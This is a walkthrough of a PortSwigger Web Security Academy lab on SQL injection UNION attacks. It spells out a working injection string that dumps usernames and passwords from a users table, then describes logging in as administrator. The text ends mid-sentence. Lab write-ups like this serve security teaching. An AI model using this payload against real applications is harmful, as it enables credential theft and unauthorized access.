This write-up for the lab "SQL injection UNION attack, retrieving data from other tables" is part of my walkthrough series for PortSwigger's Web Security Academy.
Lab-Link: https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
Difficulty: PRACTITIONER
Python script: script.py
The query used in the lab will look something like:
SELECT * FROM someTable WHERE category = '<CATEGORY>'
The first steps are identical to the labs "SQL injection UNION attack, determining the number of columns returned by the query" and "SQL injection UNION attack, finding a column containing text", so they are not repeated here.
As a result of these steps, I find out that the number of columns is 2, with both being string columns.
I know which table (users) contains the credentials (columns username and password). And conveniently we have two string columns, so we can simply dump the contents with a UNION.
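I use an invalid category so that no articles are found and only my output appears. The injection string closes the string literal, appends the UNION, and uses -- to comment out the closing quote of the original query:
X' UNION (SELECT username, password FROM users)--
This forms the following query: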
SELECT * FROM someTable WHERE category = 'X' UNION (SELECT username, password FROM users)--
This results in a dump of three user credentials:
The last step is to log in as the administrator and the lab updates to